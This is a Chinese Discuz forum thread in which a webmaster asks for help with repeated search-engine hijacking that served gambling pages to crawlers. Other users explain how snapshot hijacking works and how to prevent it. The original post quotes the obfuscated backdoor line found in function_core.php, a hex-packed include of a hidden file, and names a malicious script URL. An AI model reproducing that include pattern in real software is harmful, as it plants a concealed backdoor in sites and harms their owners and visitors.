设为首页收藏本站

Discuz! 官方站

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

查看: 20899|回复: 26

[已解决] 牛逼的搜索引擎劫持,function_core.php文件

[复制链接]
发表于 2014-5-9 12:53:05 | 显示全部楼层 |阅读模式
1、DNS劫持:
    14年1月份,发现网站中了博彩,然后各种检测,包括360,包括安全联盟,在3天内,各大搜索引擎均被拦截,赶紧补漏洞找木马文件,最后确定为DNS劫持,最后经过不懈努力,找到了文件进行删除,然后补漏洞然后安全联盟申请解封,具体原因有可能是黑客扫描攻击外,查到可能品牌商家或者某个插件有漏洞。
2、连续3次搜索引擎劫持

  以前的DOS攻击就不说了,DNS劫持也不说了,这都是大家知道的也了解的,但是3月份又被各大搜索引擎拦截,还是各种查,无果,因为没查出木马文件,访问都正常,页面都正常,就一点只要是搜索引擎都是博彩,感觉可能上次没处理完,留下的后门,但是还是没找到原因,在安全联盟查,技术员说是我中了http://api.discuz.com.de/Seo.js病毒,打开可以看到,只要是搜索引擎都被拦截,咨询很多站长和技术,均表示无果,在对服务器全盘扫描,然后再对文件进行校验,发现是function_core.php文件里面有加密的代码进行了调用,
370行:
INCLUDE(pack('H*','633a5c77696e646f77735c74656d705c2e53595344554d505c2e576830416d492e434f5245'));删除这段代码然后蜘蛛正常,

到这里以为没事了,一个月后又博彩,结果还是这个文件被修改,采用同样办法。再次扫描还是没找到根源。

3、第三次中毒

    修改function_core.php文件,因为前两次经验,只要再中,就先找这个文件,但是我一般先看修改文件的日期,结果这个文件在一周内没有被修改,就忽略了,找很多地方没找到原因,再次对比这个文件发现 还是function_core.php加了加密代码1012行。删除后表示正常。
1.jpg
 楼主| 发表于 2014-5-9 13:03:41 | 显示全部楼层

1、我主要做内容,技术一般,很多东西都是慢慢在学,上面的表达也许有些地方不准确,大家不要笑话。
2、这个搜索劫持很烦人,关键是我的站已经没有了排名和收录
3、关于蜘蛛模拟,以为我都是用站长网或者第三方,发现都不准确存在缓存,后来专门用百度站长工具,只有这一个才是实时模拟的,其余的都不准,http://zhanzhang.baidu.com
4、至于我连续中这样的劫持,说明我还没找到根源,所以求助大家帮我找到根源,怎么修改的我的这个文件,是怎么样进行加密和调用的,帮我找到根源才可以,不然肯定还有第四次。
5、如果大家中了这个,简单说一下我的流程,先在百度站长模拟蜘蛛爬行: 2.jpg ,然后后台文件校验,看近期修改的那个文件,然后一个个逐级排查,接着处理木马文件,然后进行备份和补漏洞,然后到安全联盟进行解封。


现在做个站太难了,我是在省级门户做内容管理,这个www.xinmiba.com 是自己弄着玩呢,去年天天被攻击,今年天天中木马,一点不赚钱还贴我大量精力时间,当然也让我从中学了很多东西。做一个DZ站,宣传部门要管、网监要管、工信部、通讯管理局、文化厅都要管,上月我的网站转了2个优酷的视频,又冒出来个文广新局把我的站封了,我写了个保证书才开。。。。。。一句话:当个站长太难了
回复

使用道具 举报

发表于 2014-5-9 13:20:39 | 显示全部楼层
一句话:当个站长太难
回复

使用道具 举报

发表于 2014-5-9 13:27:53 | 显示全部楼层
技术上不懂,但看遭遇绝对要支持你,我的站目前只在内网,被你这么一说,都不敢挂外网了
回复

使用道具 举报

 楼主| 发表于 2014-5-9 17:29:17 | 显示全部楼层
亲们,求解决根源啊,不然过不了几天我肯定还被劫持
回复

使用道具 举报

发表于 2014-5-9 17:31:16 | 显示全部楼层
环境不安全 被挂马 哦~ 这个是劫持快照的
回复

使用道具 举报

 楼主| 发表于 2014-5-9 17:32:17 | 显示全部楼层
crx349 发表于 2014-5-9 17:31
环境不安全 被挂马 哦~ 这个是劫持快照的

的确是劫持快照的,各大搜索都劫持,关键是我找到这个文件,但是不是根源,我找不到根源
回复

使用道具 举报

发表于 2014-5-9 17:54:56 | 显示全部楼层
窃持什么的太可恶了
回复

使用道具 举报

 楼主| 发表于 2014-5-9 17:56:04 | 显示全部楼层
百度快照的劫持原理

首先我们要认识清楚百度快照劫持的原理,黑客不是直接进入百度快照数据库进行修改,百度快照数据库的安全性,估计一般的黑客是很难侵入的。黑客也不是网络欺骗(点击一个网站快照网络被欺骗访问到了另一个网站快照),这种网络欺骗黑客也是很难攻击的,至少成本非常大,不至于攻击你的网站。最后一种,就是黑客直接侵入一个网站,修改网站的代码,修改成黑客设置的代码,当搜索引擎快照更新时,就更新成黑客的快照了。百度快照劫持也是通过这种方法实现的。要想百度快照劫持一个网站,首先必须先侵入该网站,获得该网站的控制权,如何修改该网站的代码,百度蜘蛛抓取,更新快照,百度快照就变成其他的快照了。

预防百度快照劫持的方法

通过百度快照劫持的原理我们知道,百度快照要被劫持,首先必须入侵该网站,如果网站安全做的好,黑客无法入侵,自热而然就不会百度快照劫持了。因此要做好网站的安全性工作,检查网站程序是否有漏洞,发现漏洞及时修复,程序后台,ftp密码是否足够复杂,服务器是否经常修复,服务器安全性是否有保证。因此一般做好三个方面,程序避免有漏洞,防止黑人注入,程序后台,ftp密码足够复杂防止强力破解,服务器足够安全,防止利用漏洞被入侵,如果做好以上三个方面,基本可以确保网站的安全。

发生百度快照劫持的处理方法

当网站被百度快照劫持了,如果处理呢?

1、删除黑客程序代码,确保程序代码正常。

2、百度快照投诉,网站代码确保正常以后,进行百度快照投诉,尽快恢复正常快照。

3、漏洞修复,避免下次再次被劫持。

回复

使用道具 举报

 楼主| 发表于 2014-5-9 17:58:09 | 显示全部楼层
劫持快照的 我也看了  
这三次都是修改的这个文件,includ的加密代码
我现在关键是找不到根源,不能中毒我就删除代码,我要找到怎么中的,现在找不到愁人
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|Comsenz ( 粤B2-20090059-165 )  star

GMT+8, 2018-11-16 05:59

Powered by Discuz! X3.3

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表